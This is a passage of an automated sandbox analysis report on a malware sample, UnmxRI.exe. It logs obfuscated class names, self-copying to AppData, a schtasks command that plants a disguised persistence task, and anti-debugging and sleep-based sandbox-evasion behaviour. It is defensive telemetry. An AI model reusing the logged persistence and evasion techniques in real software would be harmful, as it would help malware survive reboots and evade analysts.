                    Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, G8ANMjDiUOOsLbf5bW.csHigh entropy of concatenated method names: 'RB9X2vFRFS', 'MmcXTlI2FD', 'PYSXF7ZpZv', 'zl2XAMBg7S', 'WsJXHR7twv', 'YQvXhh4iT7', 'P8L6oSXl8uTkZbEALR', 'AXnwuwiZMuPbt3xcqe', 'gZBXX0ipLJ', 'XJ8Xjb5fjE'
                    Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, QqOQQeGEHtIKD26w4j.csHigh entropy of concatenated method names: 'bsfkcaKqpb', 'Vewk3oXNXc', 'd78k740pn5', 'm1JkeY49vx', 'oqgk6IHtop', 'Jeuk2hct4G', 'wFWkTiWGWH', 'bJpk5V1Viv', 'RdRkFKbg66', 'btOkAcOmHC'
                    Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, yx3SuvyOU8mOkkWcOq.csHigh entropy of concatenated method names: 'jDmNGidmbU', 'sMgNZpfaZr', 'vH9k4MSTcd', 'euRkXe5nBi', 'oHwNKyZE0u', 'n7yNMB8ynA', 'FYvN9TobXy', 'VuHNmWgQf6', 'PulNWdr2tC', 'wXnNfdaJ55'
                    Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, SymJM23RQnEk4iIX2O.csHigh entropy of concatenated method names: 'Dispose', 'NitX8BeoJj', 'FhBLryT4lk', 'dFhnnlGX2t', 'n9qXZOQQeE', 'otIXzKD26w', 'ProcessDialogKey', 'ajZL4MmuGV', 'qraLXuB8XD', 'S6kLLWXZXi'
                    Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, Ekk9xhzYCDV7Ex5F26.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'pu1Eguv5Zg', 'qTZEH1KGfY', 'd3GEhkvp36', 'OiWENR5FFf', 'JdFEkgxuOj', 'QZjEEURWTK', 'UpfE0t1Yht'
                    Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, p9w2kf7E5ROrPRdwHn.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'R4AL82XYdI', 'EN8LZAWZbV', 'XLQLzMPMw3', 'aR6j4QR4ET', 'zbMjXJ7QlH', 'wZdjLoFL3Y', 'LPDjjrn6MG', 'IsB8PojjsxdJ0uHqSPp'
                    Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, dy4scYnfQbod41ZQD7.csHigh entropy of concatenated method names: 'b9r2vTjDa3', 'eEA2iHafSf', 'o6m21ErpDf', 'wos2VV3TOu', 'eHB2IloEcE', 'bpQ2xRtV2m', 'hK02Y87xu7', 'YEW2SGeppI', 'Cmb2a4i5yH', 'sGh2bRe8nR'
                    Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, dTCWREXjx9L4UMSOtYS.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'cms0m3nDVm', 'jdK0Wv4TQj', 'Yyl0fBUTgg', 'lAg0u7p1dx', 'BTS0OFaYyB', 'AD60yqXK0j', 'KxA0P62b3p'
                    Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, wg7S07bfqZusaPsJR7.csHigh entropy of concatenated method names: 'H5DeI6GtuS', 'cLTeY2DP53', 'Jb27JFyVah', 'Lt77CXFYjZ', 'Myn7odbQbp', 'Htv7tuIhky', 'S2I7dTGqBi', 'u647lXFiOQ', 'xch7n0r6wu', 'wL47U82mf3'
                    Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, QvFRFSSlmclI2FDck0.csHigh entropy of concatenated method names: 'Gig3mc1SVe', 'XLc3WuYFwJ', 'zwO3fdWLKx', 'PMO3u53vLM', 'b763O20BGD', 'eTC3ykEQQa', 'kui3PnsM11', 'zA83GHCxs7', 'g8W38WQHh9', 'pdl3Zn8GqB'
                    Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, Kwv8QvRh4iT7DFlSdJ.csHigh entropy of concatenated method names: 'tXV6qYbjn1', 's5863VWP2h', 'U8x6e8poL1', 'KIK62wAQbZ', 'gXV6TG8Y8r', 'H9QeObY2ad', 'kifeyyh6WN', 'L5ZePFVMio', 'GkFeGgi5QG', 'fGle8H2J9M'
                    Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, NXBkOsdoPa6RYALGIN.csHigh entropy of concatenated method names: 'EpB2cXgwjv', 'KuB27sBrjt', 'iwM2676QBa', 'yPR6ZW7SdG', 'TCR6z5h4Xf', 'A4k24smHTA', 'r1K2XbQJWs', 'j8N2L9xNsX', 'uEo2jKnHXY', 'mfk2Dn8Ckq'
                    Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, SXZXiSZvQcU2WLCXGo.csHigh entropy of concatenated method names: 'SdqEX7gxFg', 'vRhEjKJIEa', 'zuQEDVOVUZ', 'WKnEcQ8hjf', 'hZWE3ddLJY', 'v7JEe7uTBX', 'fGEE6HBvbU', 'du4kPUlfr5', 'RXAkGRqt8r', 'vJCk8Df8UL'
                    Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, YMmuGV8NrauB8XDf6k.csHigh entropy of concatenated method names: 'hVwkRKRHGt', 'e6MkrsGX2g', 'qPMkJCmWCj', 'HAgkCO1hNt', 'ooSkmne1QN', 'Mu0ko071mh', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.UnmxRI.exe.4fb0000.8.raw.unpack, pxAkq6oWv5iOjnf3uT.csHigh entropy of concatenated method names: 'icjOT7esaw', 'RgtTUJcyZL', 'tgAOeop8hG', 'SQdOgp9kxG', 'QvUO4fqikd', 'g2kOnTKoV9', 'gdqsYhH0gi7JU', 'pRVYZ8BkJ', 'JseuiWZFl', 'DLEr932Lv'
                    Source: 0.2.UnmxRI.exe.4fb0000.8.raw.unpack, fLjEu4070dl47BbVwy.csHigh entropy of concatenated method names: 'fLj0Eu470', 'El4O7BbVw', 'hwUiEND30', 'HSH8bFl4M', 'ooYpdiDj1', 'HOPAJfGB3', 'qnP3At5It', 'uFCygHQ01', 'zCkJygWNp', 'NIEFabhsg'
                    Source: 0.2.UnmxRI.exe.4fb0000.8.raw.unpack, yfqikd0p32kTKoV93bB.csHigh entropy of concatenated method names: 'ijUOUUVsdX', 'JQtOjsnu1l', 'NUtOMveQlB', 'qEqOEHEb3H', 'TxnO95b71H', 'jB8Oxm27U0', 'ATROQ4dcm2', 'abbOdnfCZw', 'PBiO6KDnyP', 'v95Ot388NV'
                    Source: 0.2.UnmxRI.exe.24d10ec.0.raw.unpack, Ft.csHigh entropy of concatenated method names: 'lZA', 'RgtTUJcyZL', 'dZ3', 'MZx', 'NZe', 'EZk', 'XNe8QK', 'mP', 'aY', 'ys'
                    Source: 0.2.UnmxRI.exe.6850000.10.raw.unpack, Ft.csHigh entropy of concatenated method names: 'lZA', 'RgtTUJcyZL', 'dZ3', 'MZx', 'NZe', 'EZk', 'XNe8QK', 'mP', 'aY', 'ys'
                    Source: 10.2.tehuvFgZlLZK.exe.2917b78.0.raw.unpack, Ft.csHigh entropy of concatenated method names: 'lZA', 'RgtTUJcyZL', 'dZ3', 'MZx', 'NZe', 'EZk', 'XNe8QK', 'mP', 'aY', 'ys'
                    Source: C:\Users\user\Desktop\UnmxRI.exe File created: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe

                    Boot Survival

                    Source: C:\Users\user\Desktop\UnmxRI.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tehuvFgZlLZK" /XML "C:\Users\user\AppData\Local\Temp\tmpB814.tmp"

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Users\user\Desktop\UnmxRI.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\print.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: Yara match File source: Process Memory Space: UnmxRI.exe PID: 6972, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: tehuvFgZlLZK.exe PID: 6844, type: MEMORYSTR
                    Source: C:\Windows\SysWOW64\print.exe API/Special instruction interceptor: Address: 7FF8C88ED324
                    Source: C:\Windows\SysWOW64\print.exe API/Special instruction interceptor: Address: 7FF8C88ED7E4
                    Source: C:\Windows\SysWOW64\print.exe API/Special instruction interceptor: Address: 7FF8C88ED944
                    Source: C:\Windows\SysWOW64\print.exe API/Special instruction interceptor: Address: 7FF8C88ED504
                    Source: C:\Windows\SysWOW64\print.exe API/Special instruction interceptor: Address: 7FF8C88ED544
                    Source: C:\Windows\SysWOW64\print.exe API/Special instruction interceptor: Address: 7FF8C88ED1E4
                    Source: C:\Windows\SysWOW64\print.exe API/Special instruction interceptor: Address: 7FF8C88EDA04
                    Source: C:\Windows\SysWOW64\print.exe API/Special instruction interceptor: Address: 7FF8C88ED744
                    Source: C:\Windows\SysWOW64\print.exe API/Special instruction interceptor: Address: 7FF8C88EDA44
                    Source: C:\Users\user\Desktop\UnmxRI.exe Memory allocated: 2300000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\UnmxRI.exe Memory allocated: 24A0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\UnmxRI.exe Memory allocated: 44A0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\UnmxRI.exe Memory allocated: 7210000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\UnmxRI.exe Memory allocated: 8210000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\UnmxRI.exe Memory allocated: 84C0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\UnmxRI.exe Memory allocated: 94C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe Memory allocated: B70000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe Memory allocated: 2690000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe Memory allocated: 25D0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe Memory allocated: 6FC0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe Memory allocated: 7FC0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe Memory allocated: 6FC0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\UnmxRI.exe Code function: 9_2_018E096E rdtsc 9_2_018E096E
                    Source: C:\Users\user\Desktop\UnmxRI.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4678
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4432
                    Source: C:\Windows\SysWOW64\print.exe Window / User API: threadDelayed 9672
                    Source: C:\Users\user\Desktop\UnmxRI.exe API coverage: 1.3 %
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe API coverage: 0.3 %
                    Source: C:\Windows\SysWOW64\print.exe API coverage: 2.7 %
                    Source: C:\Users\user\Desktop\UnmxRI.exe TID: 5656 Thread sleep time: -35529s >= -30000s
                    Source: C:\Users\user\Desktop\UnmxRI.exe TID: 5588 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5900 Thread sleep count: 4678 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6224 Thread sleep time: -3689348814741908s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6148 Thread sleep count: 178 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3732 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5776 Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5016 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe TID: 6332 Thread sleep time: -35529s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe TID: 1576 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\print.exe TID: 7132 Thread sleep count: 301 > 30
                    Source: C:\Windows\SysWOW64\print.exe TID: 7132 Thread sleep time: -602000s >= -30000s
                    Source: C:\Windows\SysWOW64\print.exe TID: 7132 Thread sleep count: 9672 > 30
                    Source: C:\Windows\SysWOW64\print.exe TID: 7132 Thread sleep time: -19344000s >= -30000s
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe TID: 2704 Thread sleep time: -80000s >= -30000s
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe TID: 2704 Thread sleep count: 31 > 30
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe TID: 2704 Thread sleep time: -46500s >= -30000s
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe TID: 2704 Thread sleep count: 40 > 30
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe TID: 2704 Thread sleep time: -40000s >= -30000s
                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\print.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\print.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_004BC0B0 FindFirstFileW,FindNextFileW,FindClose,16_2_004BC0B0
                    Source: C:\Users\user\Desktop\UnmxRI.exeThread delayed: delay time: 35529Jump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeThread delayed: delay time: 35529Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exe Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\UnmxRI.exe Process queried: DebugPort
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe Process queried: DebugPort
                    Source: C:\Windows\SysWOW64\print.exe Process queried: DebugPort
                    Source: C:\Users\user\Desktop\UnmxRI.exe Code function: 9_2_018E096E rdtsc
                    Source: C:\Users\user\Desktop\UnmxRI.exe Code function: 9_2_00417583 LdrLoadDll
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018C45B1 mov eax, dword ptr fs:[00000030h]9_2_018C45B1
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DE5CF mov eax, dword ptr fs:[00000030h]9_2_018DE5CF
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DE5CF mov eax, dword ptr fs:[00000030h]9_2_018DE5CF
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A65D0 mov eax, dword ptr fs:[00000030h]9_2_018A65D0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DA5D0 mov eax, dword ptr fs:[00000030h]9_2_018DA5D0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DA5D0 mov eax, dword ptr fs:[00000030h]9_2_018DA5D0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DC5ED mov eax, dword ptr fs:[00000030h]9_2_018DC5ED
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DC5ED mov eax, dword ptr fs:[00000030h]9_2_018DC5ED
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A25E0 mov eax, dword ptr fs:[00000030h]9_2_018A25E0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018CE5E7 mov eax, dword ptr fs:[00000030h]9_2_018CE5E7
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018CE5E7 mov eax, dword ptr fs:[00000030h]9_2_018CE5E7
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018CE5E7 mov eax, dword ptr fs:[00000030h]9_2_018CE5E7
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018CE5E7 mov eax, dword ptr fs:[00000030h]9_2_018CE5E7
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018CE5E7 mov eax, dword ptr fs:[00000030h]9_2_018CE5E7
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018CE5E7 mov eax, dword ptr fs:[00000030h]9_2_018CE5E7
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018CE5E7 mov eax, dword ptr fs:[00000030h]9_2_018CE5E7
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018CE5E7 mov eax, dword ptr fs:[00000030h]9_2_018CE5E7
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01936500 mov eax, dword ptr fs:[00000030h]9_2_01936500
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01974500 mov eax, dword ptr fs:[00000030h]9_2_01974500
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01974500 mov eax, dword ptr fs:[00000030h]9_2_01974500
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01974500 mov eax, dword ptr fs:[00000030h]9_2_01974500
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01974500 mov eax, dword ptr fs:[00000030h]9_2_01974500
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01974500 mov eax, dword ptr fs:[00000030h]9_2_01974500
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01974500 mov eax, dword ptr fs:[00000030h]9_2_01974500
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01974500 mov eax, dword ptr fs:[00000030h]9_2_01974500
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018CE53E mov eax, dword ptr fs:[00000030h]9_2_018CE53E
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018CE53E mov eax, dword ptr fs:[00000030h]9_2_018CE53E
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018CE53E mov eax, dword ptr fs:[00000030h]9_2_018CE53E
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018CE53E mov eax, dword ptr fs:[00000030h]9_2_018CE53E
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018CE53E mov eax, dword ptr fs:[00000030h]9_2_018CE53E
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B0535 mov eax, dword ptr fs:[00000030h]9_2_018B0535
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B0535 mov eax, dword ptr fs:[00000030h]9_2_018B0535
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B0535 mov eax, dword ptr fs:[00000030h]9_2_018B0535
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B0535 mov eax, dword ptr fs:[00000030h]9_2_018B0535
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B0535 mov eax, dword ptr fs:[00000030h]9_2_018B0535
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B0535 mov eax, dword ptr fs:[00000030h]9_2_018B0535
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A8550 mov eax, dword ptr fs:[00000030h]9_2_018A8550
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A8550 mov eax, dword ptr fs:[00000030h]9_2_018A8550
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018D656A mov eax, dword ptr fs:[00000030h]9_2_018D656A
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018D656A mov eax, dword ptr fs:[00000030h]9_2_018D656A
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018D656A mov eax, dword ptr fs:[00000030h]9_2_018D656A
